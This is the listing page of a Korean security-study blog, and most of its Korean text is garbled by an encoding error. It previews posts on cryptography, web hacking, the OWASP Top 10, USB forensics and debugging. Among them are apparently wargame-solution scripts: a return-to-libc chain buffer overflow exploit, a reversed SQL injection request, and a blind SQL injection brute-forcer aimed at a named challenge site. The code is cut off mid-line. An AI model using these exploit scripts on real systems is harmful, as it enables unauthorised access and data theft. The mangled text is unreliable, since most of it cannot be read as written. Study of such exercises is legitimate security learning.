728x90 ๋ฐ์ํ ์ ์ฒด ๊ธ284 12์ 1์ผ... ๋ฒ์จ 11์์ด ๋ค์ง๋๊ฐ๊ณ 12์์ด ์๋ค์? ๋ค๋ค 12์์ ๋ง์ด ํ ์ค๋น๋ ๋คํ์ จ๋์? ๋ ์จ๋ ๊ธ๊ฒฉํ๊ฒ ์ถ์์ง๊ณ ... ์ ๋ ๋ช์ผ๋์ ์ด๊ฒ์ ๊ฒ ์๊ฐํ๋ค๊ณ ๋ธ๋ก๊ทธ๋ ํจ๋์ด ์๋๋ด ๋๋ค.ใ ใ ์ ๋ 12์ ๋ถํฐ ํฌ๋ ์๊ณผ ๋ชจ์ํดํน์ชฝ์ผ๋ก ๊ณต๋ถํด๋ณผ๋ ค๊ณ ํฉ๋๋ค. ๋ฌผ๋ก ๋ธ๋ก๊ทธ๋ ์ ์ผ๋ฉด์ ๋ง์ด์ฃ !!! ์ฌ๋ฌ๋ถ๋ค์ ์ด๋ ํ ๊ณํ์ ๊ฐ์ง๊ณ ํ๋ฐ์ง์ฉ ๋ค๊ฐ๊ฐ์๊ณ ์๋์? ์์ฐธ!! ๋ํ์ฌ์ดํธ์์ ์ ์ฑ์ฝ๋ ์ ํฌ๋๊ณ ์๋ค๊ณ ํฉ๋๋ค. ๋ค๋ค ์กฐ์ฌํ์๊ณ ์์ธํ ๋ด์ฉ์ http://facebook.com/pwnplay ์์ ํ์ธํด์ฃผ์ธ์!! ์ข์์๋ ํ๋ฒ์ฉ ๋๋ฌ์ฃผ์๊ณ ์ !!! ๋ค๋ค ๊ฐ๊ธฐ์กฐ์ฌํ์ธ์!!! My Story 2015. 12. 1. ์ํธํ ๊ณ ๋ ์ํธ - ์ํธ๋ฌธ์์ ์๋ฌธ์ ์ ์ถํ ์ ์๋ค.ํ๋ ์ํธ - ๊ณ ๋์ํธ์ ๋ฐ๋๋ก ์ํธ๋ฌธ์์ ์๋ฌธ์ ์ ์ถํ ์๊ฐ ์๋ค.์ด์ ๋ ์์ฆ์ ํ๋์ํธ๋ ์ํ์ ์๋ฆฌ๋ก ํ๊ธฐ ๋๋ฌธ์ด๋ค. ํ๋ ์ํธ์๋ฐฉํฅ ์ํธํ - ์ํธ๋ฌธ์ ๋ค์ ํ๋ฌธ์ผ๋ก ๋ณต์์ ํ ์์๋ค. - ๊ฐ์ญ์ - Encrytion๋์นญํน ์ํธ vs ๊ณต๊ฐํค ์ํธ(= ๋น๋์นญํค ์ํธ)1) ๋์นญํค ์ํธ - ์ํธํค์ ๋ณตํธํ ํค๊ฐ ๊ฐ๋ค. - ๋น๊ต์ ์ฐ์ฐ์ ์์ด ์ ์ด ๊ณ์ฐ์ด ๋น ๋ฅด๋ค. - ์คํธ๋ฆผ ์ํธ์ ๋ธ๋ก ์ํธ ์ฆ, 2์ข ๋ฅ๋ก ๋๋๋ค.1) ์คํธ๋ฆผ ์ํธ - ํ ๋ฒ์ ํ ๋นํธ๋ ํ ๋ฐ์ดํธ ๋จ์๋ก ์ํธํ ๋๋ค. - ๋ธ๋ก ์ํธ๋ณด๋ค ๋น ๋ฅด๋ ๋ฎ์ ๋ณด์์ฑ์ ๊ฐ์ง๋ค. - ๋คํธ์ํฌ ์ก์์ , ์คํธ๋ฆฌ๋ฐ ๋ฑ์ ์ฌ์ฉ๋๋ค.2) ๋ธ๋ก ์ํธ - ํ ๋ฒ์ ํน์ ๋ธ๋ก(๋ฐ์ดํธ) ๋จ์๋ก ์ํธํ ๋๋ค. - ์ ํด์ง ํฌ.. Security Study/System 2015. 11. 28. ์น ํดํน ๊ธฐ๋ณธ ์น ํดํน์ ํ๋ ๋ฐฉ๋ฒ์๋ ํฌ๊ฒ 2๊ฐ์ง๋ก ๋๋์ด ์ง๋ค.1. ์ง๊ด์ ์ผ๋ก ์ทจ์ฝ์ ์ด ์์ ๋งํ ๋ถ๋ถ์ ์ฐพ์์ ์นจํฌํ๋ ๊ฒ์ด๊ณ ,2. ์ ๋ฐ์ ์ผ๋ก ๋ฐ๊ฒฌ ๊ฐ๋ฅํ ๋ชจ๋ ๊ณต๊ฒฉ ํ๋ฉด์ ์ฐพ์์ ๋งคํธ๋ฆญ์ค๋ฅผ ์์ฑํ ํ ํ๋์ฉ ๊ณต๊ฒฉํด๋ณด๋ ๊ธฐ๋ฒ์ด๋ค. ๊ธฐ๋ณธ์ ์ผ๋ก ํดํน์ ๊ณผ์ ์ ์ ๋ฆฌํ๋ฉด ๊ณต๊ฒฉ ๋์ ์ ์ -> ์ ๋ณด ์์ง -> ์ทจ์ฝ์ ๋ถ์ -> ๊ณต๊ฒฉ -> ํ์ ์ ๊ฑฐ์ด๋ฌํ ์์ผ๋ก ์ด๋ฃจ์ด ์ง๋ค. OWASP TOP10 1 - ์ธ์ ์ ์ทจ์ฝ์ 2 - ํฌ๋ก์ค ์ฌ์ดํธ ์คํฌ๋ฆฝํ 3 - ์ทจ์ฝํ ์ธ์ฆ ๋ฐ ์ธ์ ๊ด๋ฆฌ 4 - ์์ ํ์ง ์์ ์ง์ ๊ฐ์ฒด ์ฐธ์กฐ 5 - ํฌ๋ก์ค ์ฌ์ดํธ ์์ฒญ ๋ณ์กฐ 6 - ๋ณด์์ ์๋ชป๋ ๊ตฌ์ 7 - ์์ ํ์ง ์์ ์ํธ ์ ์ฅ 8 - URL์ ๊ทผ ์ ํ ์คํจ 9 - ๋ถ์ถฉ๋ถํ ์ ์ก ๊ณ์ธต ๋ณดํธ 10 - ๊ฒ์ฆ๋์ง ์์ ๋ฆฌ๋ค์ด๋ ํธ์ ํฌ์๋ Security Study/Web 2015. 11. 24. USB ์์ฒด๊ฐ ์๋ ์ด์์ฒด์ ๋จ์์ ์ ์ฅ์ฅ์น์์ ์ฐ๊ธฐ ๋ฐฉ์งํ๊ธฐ ์ ๋ชฉ ๊ทธ์์ฒด๋ก ์ ์ฅ์ฅ์น์์๊ฐ ์๋ ์ด์์ฒด์ ๋จ์์ ์ ์ฅ์ฅ์น์์ ์ฐ๊ธฐ ๋ฐฉ์งํ๋ ๋ฐฉ๋ฒ์ด๋ค.์ด๋ป๊ฒ ๋ณด๋ฉด ์ข๊ณ ์ด๋ป๊ฒ ๋ณด๋ฉด ์.... - Key : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies- Value : WriteProtect- Data : 0x00000001 (์ฐ๊ธฐ ๋ฐฉ์ง ์ค์ ), 0x00000000 (์ฐ๊ธฐ ๋ฐฉ์ง ํด์ ) For3nsic/Forensic 2015. 11. 23. USB forensic ์ต๊ทผ๋ค์ด ์ด๋์ ๋์คํฌ ์ฆ, USB์ ์ฌ์ฉ์ด ๋ง์์ง๊ณ ์๋ค. ๋ํ ์์ผ๋ก๋ ๋์ด๋ ๊ฒ ๊ฐ์? ๋๋์ด ๋ค๊ณ ์ด๋ฅผ ์ ์ฑ์ฝ๋ ์ ํฌ ๋๋ ์๋ฃ ์ ํฌ ๋ฑ์ผ๋ก ๋ง์ด ์ด์ฉ ๋๊ณ ์๋ค. ๊ณผ์ฐ usb๋ ์ด๋ป๊ฒ ์ธ์์ด ๋๊ณ ์ด๋ป๊ฒ ์ฌ์ฉ๋ ๊น? ๋จผ์ usb๋ฅผ ๊ฝ์์ ๋ Bus Driver๋ผ๋ ๊ณณ์์ PnP Manager์๊ฒ ์ ์กฐ์ฌ์ device์ ์ผ๋ จ ๋ฒํธ๋ฅผ ๋ณด๋ด์ด ์ฐ๊ฒฐ์ด ๋์์์ ์๋ฆฐ๋ค.๊ทธ ํ ์ปค๋๋ชจ๋ PnP Manager๋ ๋ ์ง์คํธ๋ฆฌ๋ฅผ ๊ธฐ๋ฐ์ผ๋ก ๋๋ผ์ด๋ฒ๊ฐ ์ค์น๋์ด์๋์ง๋ฅผ ํ์ธํ๋ค.๋ง์ฝ ์ค์น๊ฐ ๋์ด ์์ง ์๋ค๋ฉด ์ปค๋๋ชจ๋ PnP Manager๋ ์ ์ ๋ชจ๋ PnP Manager์๊ฒ ๋๋ผ์ด๋ฒ์ ๊ด๋ จ ์ํญ์ ์ ๋ฌ ํ๋ค. ์ค์น๊ฐ ๋์ด ์๋ค๋ฉด ๋๋ผ์ด๋ฒ๋ฅผ ๋ก๋ํ๋ค.์์ ๊ณผ์ ์ ๋ง์น๋ฉด ๋ ์ง์คํธ๋ฆฌ์ ๊ธฐ๋ก์ํ๊ณ ์ค์น๊ณผ์ ์ SetupAPI ๋ก๊ทธ.. For3nsic/Forensic 2015. 11. 23. ์์ ํ๋ก์ธ์ค ๋๋ฒ๊น ํ๊ธฐ ๋๋ฒ๊น ์ ํ๋ค๋ณด๋ฉด ์์ ํ๋ก์ธ์ค๋ ๋๋ฒ๊น ์ด ๋์ง ์์ ๋๋ ์๋๊ตฐ์! ๊ทธ๋์ ํ๋ฒ ๊ฒ์ํด ๋ดค์ต๋๋น!! ๊ฒ์์ ํด๋ณด๋ MSDN์๋์ ์ด ํจ์๊ฐ ๋์ค๋๋ฐ์!! ์ด ์ดํจ์๋ฅผ ์ ์ฝ์ด ๋ณด๋ DEBUG_PROCESS ๋ผ๋ ๊ฒ์ ์ฐพ์ ์ ์์์ต๋๋ค. DEBUG_PROCESS ์ด๋ Process Creation์ ์ธ์๋ก debug_process์ธ์๋ก ๋๊ฒจ์ฃผ๋ฉด ๋๋ค๊ณ ๋ช ์๋์ด ์์ต๋๋ค. Security Study/System 2015. 11. 22. ๊ฒฝํฌ๋ํ๊ต SoftCon ํ๊ธฐ ์ค๋ ํ ์์ผ!!! ๊ฒฝํฌ๋ํ๊ต์์ ์ 1ํ SoftCon์ด ์ด๋ ธ์ต๋๋ค.!! ์ง์ง์ง ์ SoftCon์ผ๊น์??? ๋ฌ์ฝคํ๋ฐ์ ^^!!!! 12์ ๋ถํฐ ๋ฑ๋ก์ ์ฒญ์ธ๋ฐ 11์ 30๋ถ์ ๋์ฐฉํด์ 30๋ถ ๋์ ๋ฉ๋ฑ๋ฉ๋ฑ ์๋ค๊ฐ 12์๋ถํฐ ๋ฑ๋ก์ ํ๋ ์ ์ฌ๋ ์ฃผ๋๋ผ๊ตฌ์!!! ์ ์ฌ์ ๋น๋ก ํ์ฅ ๋์๋ฝ์ด์์ง๋ง ์์ฒญ ๋ง์์์ต๋๋ค. 1์ 30๋ถ๋ถํฐ ๋ค์ด๋ฒ์ ๋ค๋์๋ ํ๊ท๋์ ๊ฐ์๋ก ์คํํธ๋ฅผ ํ์ต๋๋ค.! ์ ๋ง ์ฌ๋ฐ์์ด์!! ์ค์ ๋ค์ด๋ฒ์ ์๋ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ์ค๋ช ํด์ฃผ์๋ ์ผ๋ง๋ ์ฌ๋ฏธ์๋์ง! ๋ค์์ ๋ผ์ฆ๋ฒ ๋ฆฌํ์ด์ ๊ดํ ๋ด์ฉ์ด ์์ต๋๋ค. ํ ๊ฐ์ง ์์ฌ์ด์ ์ ์ง๋ฌธ์ ๋ํ ๋ต๋ณ์ ์ ๊ฐ ์ํ๋ ๋ต๋ณ์ด ์๋์์ด์ ใ ใ ใ ๊ทธ๋๋ ์ง๋ฌธํ๋ค๊ณ ํฐ์ ์ธ ๋ ๋ฐ๊ณ !!!!! ์ ์ท ์ด ์๊ฒผ์ต๋๋ค.!!! ํฌ์คํธ์๋ ๋ฐ์๋๋ฐ ๋น์ธ๋ณด์์ด์! ์ด๋ ๊ฒ ์ข์๊ฑธ ์ฃผ.. My Story 2015. 11. 21. rtl chain from socket import * HOST = ""PORT = 4444 s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"payload += "\xa.. Security Study/Source 2015. 11. 21. sql injection reverse import urllibimport urllib2 url = ""req = urllib2.Request(url)sql = "union select 0x61646D696E 32%"data = "id=%00&pw=" + sql[::-1]#data = urllib.urlencode(data)req = urllib2.Request(url, data) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')req.add_header('Cookie', 'PHPSESSID=') response = urllib2.urlopen(req)h.. Security Study/Source 2015. 11. 21. ์์ผํ๋ก๊ทธ๋๋ฐ from socket import * HOST = "" #hostPORT = 4444 #port s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260 #payload print s.recv(1024) #1024 byte reads.send(payload + "\n")print s.recv(1024)print s.recv(1024) Security Study/Source 2015. 11. 21. Blind Sql Injection #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) print 1111 req.add_header('cookie',"PHPSESSID=") res = urllib2.urlopen(req) dat.. Security Study/Source 2015. 11. 21. Base 64 encoding import base64 str64=""str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Security Study/Source 2015. 11. 21. ์ด์ 1 ยทยทยท 12 13 14 15 16 17 18 ยทยทยท 24 ๋ค์ 728x90 ๋ฐ์ํ
